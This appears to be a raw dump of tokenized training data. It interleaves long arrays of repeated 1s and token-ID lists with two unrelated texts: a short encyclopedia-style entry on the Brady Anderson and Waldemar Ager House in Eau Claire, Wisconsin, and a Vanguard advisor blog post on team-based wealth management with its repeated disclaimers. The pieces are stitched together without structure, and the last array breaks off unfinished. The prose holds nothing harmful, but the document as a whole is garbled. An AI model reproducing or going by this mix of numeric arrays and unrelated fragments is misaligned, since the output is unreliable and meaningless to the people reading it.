1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Brady Anderson and Waldemar Ager House The Brady Anderson and Waldemar Ager House is a historic house located at 514 West Madison Street in Eau Claire, Wisconsin. It was added to the National Register of Historic Places in 2000. Additionally, it has been designated a Literary Landmark by the National Association of Friends of Public Libraries. History The house was built from 1892 to 1894 by craftsman Brady Anderson. It was purchased by Norwegian newspaperman and author Waldemar Ager in 1903. The Ager family owned the house until 1962, when it was bought by the local hospital. In 1993, when the hospital need the land to expand its complex, the house was donated to the Waldemar Ager Foundation. Originally located on Chestnut Street, the house was then moved to its current location. Afterwards, the house was restored to its appearance during the 1900s. The second floor has since been converted into a resource library. References Category:Houses in Eau Claire, Wisconsin Category:Houses on the National Register of Historic Places in Wisconsin Category:Libraries in Wisconsin Category:National Register of Historic Places in Eau Claire County, Wisconsin Category:Houses completed in 1894 Category:Queen Anne architecture in Wisconsin
[ 1, 1771, 3714, 17483, 322, 5260, 2310, 279, 319, 914, 5619, 13, 13, 1576, 1771, 3714, 17483, 322, 5260, 2310, 279, 319, 914, 5619, 338, 263, 22879, 3699, 5982, 472, 29871, 29945, 29896, 29946, 3122, 4104, 2285, 7103, 297, 382, 585, 6015, 533, 29892, 22581, 29889, 739, 471, 2715, 304, 278, 3086, 12577, 310, 17939, 23178, 297, 29871, 29906, 29900, 29900, 29900, 29889, 19814, 29892, 372, 756, 1063, 25373, 263, 5449, 653, 3172, 3502, 491, 278, 3086, 7993, 310, 11169, 1975, 310, 5236, 365, 4626, 4314, 29889, 13, 13, 20570, 13, 1576, 3699, 471, 4240, 515, 29871, 29896, 29947, 29929, 29906, 304, 29871, 29896, 29947, 29929, 29946, 491, 25554, 29879, 1171, 1771, 3714, 17483, 29889, 739, 471, 20848, 491, 27990, 14578, 481, 3504, 322, 4148, 5260, 2310, 279, 319, 914, 297, 29871, 29896, 29929, 29900, 29941, 29889, 450, 319, 914, 3942, 15205, 278, 3699, 2745, 29871, 29896, 29929, 29953, 29906, 29892, 746, 372, 471, 18093, 491, 278, 1887, 13457, 29889, 512, 29871, 29896, 29929, 29929, 29941, 29892, 746, 278, 13457, 817, 278, 2982, 304, 7985, 967, 4280, 29892, 278, 3699, 471, 1016, 630, 304, 278, 5260, 2310, 279, 319, 914, 10606, 29889, 22118, 635, 5982, 373, 678, 342, 21305, 7103, 29892, 278, 3699, 471, 769, 6153, 304, 967, 1857, 4423, 29889, 2860, 2935, 29892, 278, 3699, 471, 23119, 304, 967, 10097, 2645, 278, 29871, 29896, 29929, 29900, 29900, 29879, 29889, 450, 1473, 11904, 756, 1951, 1063, 11543, 964, 263, 6503, 3489, 29889, 13, 13, 1123, 10662, 13, 13, 10900, 29901, 29950, 23676, 297, 382, 585, 6015, 533, 29892, 22581, 13, 10900, 29901, 29950, 23676, 373, 278, 3086, 12577, 310, 17939, 23178, 297, 22581, 13, 10900, 29901, 29931, 4626, 4314, 297, 22581, 13, 10900, 29901, 27325, 12577, 310, 17939, 23178, 297, 382, 585, 6015, 533, 5127, 29892, 22581, 13, 13, 10900, 29901, 29950, 23676, 8676, 297, 29871, 29896, 29947, 29929, 29946, 13, 10900, 29901, 8654, 264, 10558, 11258, 297, 22581 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
For more information about Vanguard funds or Vanguard ETFs, visit advisors.vanguard.com or call 800-997-2798 to obtain a prospectus or, if available, a summary prospectus. Investment objectives, risks, charges, expenses, and other important information are contained in the prospectus; read and consider it carefully before investing. Vanguard ETF Shares are not redeemable with the issuing Fund other than in very large aggregations worth millions of dollars. Instead, investors must buy and sell Vanguard ETF Shares in the secondary market and hold those shares in a brokerage account. In doing so, the investor may incur brokerage commissions and may pay more than net asset value when buying and receive less than net asset value when selling. Investments in bond funds are subject to interest rate, credit, and inflation risk. Diversification does not ensure a profit or protect against a loss. Investments in stocks or bonds issued by non-U.S. companies are subject to risks including country/regional risk and currency risk. All investing is subject to risk, including possible loss of principal. So comprehensive wealth management is, well, comprehensive, and likely requires a team of advisors to do well. This is fortunate, because the industry has been moving toward this team-oriented approach for years. A team provides the opportunity to add specialists with depth of expertise, a feature that may help with what Cerulli found to be the second- and third-biggest competitive concerns (peers with better sales skills and niche practices, respectively). Teams allow for the diversification of not only skill sets but also personalities and demographics, offering the ability to provide a “best fit” advisor for any given client or prospect. For example: Some clients may prefer to work with more analytic advisors; others may prefer extroverts. Some clients may prefer working with an advisor with more experience; others—say millennials—may relate to someone younger. Some clients may want a significant amount of personal attention and contact; others may prefer a lot of information, education, and perspectives, but want a digital—rather than a personal—relationship. Think people, not portfolios Comprehensive wealth management is likely to be a bigger part of financial services in the future. In our opinion, wealth management isn’t a practice model focused on asset management, but on relationship management. It requires you to focus on clients as people, not portfolios. Are you prepared to deal with a variety of client personalities and preferences? If different preferences exist within a single household relationship—say, baby-boomer parents and their Gen X or millennial children and grandchildren—how can you afford not to? Don Bennyhoff He is a member of the group responsible for capital markets research and the asset allocations used in Vanguard’s fund-of-fund solutions, such as the Target Retirement Funds. The group is also responsible for maintaining and enhancing the investment methodology used for advice-based relationships with high-net-worth and institutional clients. In addition, Mr. Bennyhoff has authored a number of research papers on topics of concern for institutional and ultra-high-net-worth audiences. He earned a bachelor’s degree from Furman University, has been in the financial services industry since 1991, and is a CFA charterholder. Vanguard welcomes your feedback on this blog, but please read our commenting guidelines first. Comments will be published at our discretion. Questions or comments about your Vanguard investments or customer-service issues? Please contact us directly. Opinions expressed in blog comments are those of the persons submitting the comments, and don't necessarily represent the views of Vanguard or its management. For more information about Vanguard funds or Vanguard ETFs, visit advisors.vanguard.com or call 800-997-2798 to obtain a prospectus or, if available, a summary prospectus. Investment objectives, risks, charges, expenses, and other important information are contained in the prospectus; read and consider it carefully before investing. Vanguard ETF Shares are not redeemable with the issuing Fund other than in very large aggregations worth millions of dollars. Instead, investors must buy and sell Vanguard ETF Shares in the secondary market and hold those shares in a brokerage account. In doing so, the investor may incur brokerage commissions and may pay more than net asset value when buying and receive less than net asset value when selling. Investments in bond funds are subject to interest rate, credit, and inflation risk. Diversification does not ensure a profit or protect against a loss. Investments in stocks or bonds issued by non-U.S. companies are subject to risks including country/regional risk and currency risk. All investing is subject to risk, including possible loss of principal. About us The Vanguard Blog for Advisors™ is an interactive way for you to join in the discussion with some of our top thought leaders as they offer their perspectives on a wide range of topics that affect you as an investment professional. Keep in mind that our bloggers write from their own viewpoints. Their blog posts are not intended to be official statements made on behalf of Vanguard.
[ 1, 1152, 901, 2472, 1048, 478, 2375, 538, 29199, 470, 478, 2375, 538, 382, 8969, 29879, 29892, 6493, 25228, 943, 29889, 29894, 2375, 538, 29889, 510, 470, 1246, 29871, 29947, 29900, 29900, 29899, 29929, 29929, 29955, 29899, 29906, 29955, 29929, 29947, 304, 4017, 263, 27289, 375, 470, 29892, 565, 3625, 29892, 263, 15837, 27289, 375, 29889, 512, 10147, 358, 1203, 3145, 29892, 5161, 2039, 29892, 21090, 29892, 1518, 11259, 29892, 322, 916, 4100, 2472, 526, 11122, 297, 278, 27289, 375, 29936, 1303, 322, 2050, 372, 16112, 1434, 13258, 292, 29889, 13, 13, 29963, 2375, 538, 382, 8969, 1383, 5114, 526, 451, 337, 311, 331, 519, 411, 278, 17759, 292, 13249, 916, 1135, 297, 1407, 2919, 11404, 800, 7088, 14746, 310, 17208, 29889, 8669, 29892, 13258, 943, 1818, 15649, 322, 19417, 478, 2375, 538, 382, 8969, 1383, 5114, 297, 278, 16723, 9999, 322, 4808, 1906, 29358, 297, 263, 2545, 3946, 482, 3633, 29889, 512, 2599, 577, 29892, 278, 13258, 272, 1122, 297, 2764, 2545, 3946, 482, 844, 6847, 322, 1122, 5146, 901, 1135, 7787, 24342, 995, 746, 1321, 5414, 322, 7150, 3109, 1135, 7787, 24342, 995, 746, 269, 7807, 29889, 13, 13, 797, 10147, 1860, 297, 21224, 29199, 526, 4967, 304, 4066, 6554, 29892, 16200, 29892, 322, 4414, 362, 12045, 29889, 13, 13, 29928, 1536, 2450, 947, 451, 9801, 263, 21665, 470, 12566, 2750, 263, 6410, 29889, 13, 13, 797, 10147, 1860, 297, 10961, 29879, 470, 289, 13788, 16610, 491, 1661, 29899, 29965, 29889, 29903, 29889, 14582, 526, 4967, 304, 5161, 2039, 3704, 4234, 29914, 1727, 1848, 12045, 322, 27550, 12045, 29889, 13, 13, 3596, 13258, 292, 338, 4967, 304, 12045, 29892, 3704, 1950, 6410, 310, 5882, 29889, 13, 13, 6295, 15171, 6270, 17173, 10643, 338, 29892, 1532, 29892, 15171, 6270, 29892, 322, 5517, 6858, 263, 3815, 310, 25228, 943, 304, 437, 1532, 29889, 910, 338, 5162, 348, 403, 29892, 1363, 278, 13661, 756, 1063, 8401, 11183, 445, 3815, 29899, 12236, 287, 2948, 363, 2440, 29889, 319, 3815, 8128, 278, 15130, 304, 788, 4266, 2879, 411, 10809, 310, 17924, 895, 29892, 263, 4682, 393, 1122, 1371, 411, 825, 10580, 352, 492, 1476, 304, 367, 278, 1473, 29899, 322, 4654, 29899, 3752, 7118, 5100, 3321, 21838, 313, 412, 414, 411, 2253, 16538, 25078, 322, 302, 4070, 23274, 29892, 8307, 467, 13, 13, 7141, 2232, 2758, 363, 278, 6894, 2450, 310, 451, 871, 19911, 6166, 541, 884, 7333, 1907, 322, 1261, 1946, 1199, 29892, 27032, 278, 11509, 304, 3867, 263, 1346, 13318, 6216, 30024, 594, 19188, 363, 738, 2183, 3132, 470, 27289, 29889, 1152, 1342, 29901, 13, 13, 9526, 13154, 1122, 5821, 304, 664, 411, 901, 16114, 293, 25228, 943, 29936, 4045, 1122, 5821, 1294, 307, 369, 1372, 29889, 13, 13, 9526, 13154, 1122, 5821, 1985, 411, 385, 594, 19188, 411, 901, 7271, 29936, 4045, 30003, 20834, 3533, 2108, 616, 29879, 30003, 13029, 29279, 304, 4856, 20023, 29889, 13, 13, 9526, 13154, 1122, 864, 263, 7282, 5253, 310, 7333, 8570, 322, 6958, 29936, 4045, 1122, 5821, 263, 3287, 310, 2472, 29892, 9793, 29892, 322, 3736, 1103, 3145, 29892, 541, 864, 263, 13436, 30003, 29878, 1624, 1135, 263, 7333, 30003, 2674, 800, 4034, 29889, 13, 13, 1349, 682, 2305, 29892, 451, 2011, 4542, 2363, 13, 13, 1523, 1457, 29882, 6270, 17173, 10643, 338, 5517, 304, 367, 263, 16600, 760, 310, 18161, 5786, 297, 278, 5434, 29889, 512, 1749, 9426, 29892, 17173, 10643, 3508, 30010, 29873, 263, 6944, 1904, 21309, 373, 24342, 10643, 29892, 541, 373, 9443, 10643, 29889, 739, 6858, 366, 304, 8569, 373, 13154, 408, 2305, 29892, 451, 2011, 4542, 2363, 29889, 13, 13, 17506, 366, 13240, 304, 5376, 411, 263, 12875, 310, 3132, 7333, 1907, 322, 5821, 2063, 29973, 960, 1422, 5821, 2063, 1863, 2629, 263, 2323, 22329, 9443, 30003, 20834, 29892, 24354, 29899, 833, 12392, 11825, 322, 1009, 5739, 1060, 470, 3533, 2108, 616, 4344, 322, 4595, 11991, 30003, 3525, 508, 366, 21750, 451, 304, 29973, 13, 13, 10310, 4111, 1460, 29327, 13, 13, 3868, 338, 263, 4509, 310, 278, 2318, 14040, 363, 7483, 2791, 1691, 5925, 322, 278, 24342, 6643, 800, 1304, 297, 478, 2375, 538, 30010, 29879, 5220, 29899, 974, 29899, 27159, 6851, 29892, 1316, 408, 278, 17157, 4649, 19211, 13249, 29879, 29889, 450, 2318, 338, 884, 14040, 363, 7344, 292, 322, 427, 5403, 3277, 278, 13258, 358, 1158, 3002, 1304, 363, 9848, 29899, 6707, 21702, 411, 1880, 29899, 1212, 29899, 12554, 322, 12666, 284, 13154, 29889, 13, 13, 797, 6124, 29892, 3237, 29889, 4111, 1460, 29327, 756, 4148, 287, 263, 1353, 310, 5925, 15055, 373, 23820, 310, 5932, 363, 12666, 284, 322, 8494, 336, 29899, 9812, 29899, 1212, 29899, 12554, 12990, 819, 778, 29889, 940, 20591, 263, 289, 496, 12779, 30010, 29879, 7426, 515, 7509, 1171, 3014, 29892, 756, 1063, 297, 278, 18161, 5786, 13661, 1951, 29871, 29896, 29929, 29929, 29896, 29892, 322, 338, 263, 315, 4519, 1373, 357, 7694, 29889, 13, 13, 29963, 2375, 538, 5476, 26807, 596, 16705, 373, 445, 12618, 29892, 541, 3113, 1303, 1749, 13, 9342, 292, 1410, 10652, 1475, 13, 4102, 29889, 461, 29879, 674, 367, 6369, 472, 1749, 766, 4838, 291, 29889, 894, 29879, 470, 6589, 1048, 596, 478, 2375, 538, 13, 262, 10147, 1860, 470, 11962, 29899, 5509, 5626, 29973, 3529, 6958, 502, 4153, 29889, 6461, 262, 1080, 13384, 297, 12618, 13, 21032, 526, 1906, 310, 278, 12407, 11834, 5367, 278, 6589, 29892, 322, 1016, 29915, 29873, 12695, 2755, 278, 13, 7406, 310, 478, 2375, 538, 470, 967, 10643, 29889, 13, 13, 2831, 901, 2472, 1048, 478, 2375, 538, 29199, 470, 478, 2375, 538, 382, 8969, 29879, 29892, 6493, 25228, 943, 29889, 29894, 2375, 538, 29889, 510, 470, 1246, 29871, 29947, 29900, 29900, 29899, 29929, 29929, 29955, 29899, 29906, 29955, 29929, 29947, 304, 4017, 263, 27289, 375, 470, 29892, 565, 3625, 29892, 263, 15837, 27289, 375, 29889, 512, 10147, 358, 1203, 3145, 29892, 5161, 2039, 29892, 21090, 29892, 1518, 11259, 29892, 322, 916, 4100, 2472, 526, 11122, 297, 278, 27289, 375, 29936, 1303, 322, 2050, 372, 16112, 1434, 13258, 292, 29889, 13, 13, 29963, 2375, 538, 382, 8969, 1383, 5114, 526, 451, 337, 311, 331, 519, 411, 278, 17759, 292, 13249, 916, 1135, 297, 1407, 2919, 11404, 800, 7088, 14746, 310, 17208, 29889, 8669, 29892, 13258, 943, 1818, 15649, 322, 19417, 478, 2375, 538, 382, 8969, 1383, 5114, 297, 278, 16723, 9999, 322, 4808, 1906, 29358, 297, 263, 2545, 3946, 482, 3633, 29889, 512, 2599, 577, 29892, 278, 13258, 272, 1122, 297, 2764, 2545, 3946, 482, 844, 6847, 322, 1122, 5146, 901, 1135, 7787, 24342, 995, 746, 1321, 5414, 322, 7150, 3109, 1135, 7787, 24342, 995, 746, 269, 7807, 29889, 13, 13, 797, 10147, 1860, 297, 21224, 29199, 526, 4967, 304, 4066, 6554, 29892, 16200, 29892, 322, 4414, 362, 12045, 29889, 13, 13, 29928, 1536, 2450, 947, 451, 9801, 263, 21665, 470, 12566, 2750, 263, 6410, 29889, 13, 13, 797, 10147, 1860, 297, 10961, 29879, 470, 289, 13788, 16610, 491, 1661, 29899, 29965, 29889, 29903, 29889, 14582, 526, 4967, 304, 5161, 2039, 3704, 4234, 29914, 1727, 1848, 12045, 322, 27550, 12045, 29889, 13, 13, 3596, 13258, 292, 338, 4967, 304, 12045, 29892, 3704, 1950, 6410, 310, 5882, 29889, 13, 13, 28173, 502, 13, 13, 1576, 478, 2375, 538, 350, 1188, 363, 2087, 1730, 943, 30536, 338, 385, 28923, 982, 363, 366, 304, 5988, 297, 278, 10679, 411, 777, 310, 1749, 2246, 2714, 20251, 408, 896, 5957, 1009, 3736, 1103, 3145, 373, 263, 9377, 3464, 310, 23820, 393, 6602, 366, 408, 385, 13258, 358, 10257, 29889, 13, 13, 9598, 1022, 297, 3458, 393, 1749, 12618, 5743, 2436, 515, 1009, 1914, 1776, 9748, 29889, 11275, 12618, 11803, 526, 451, 9146, 304, 367, 6221, 9506, 1754, 373, 2306, 3131, 310, 478, 2375, 538, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 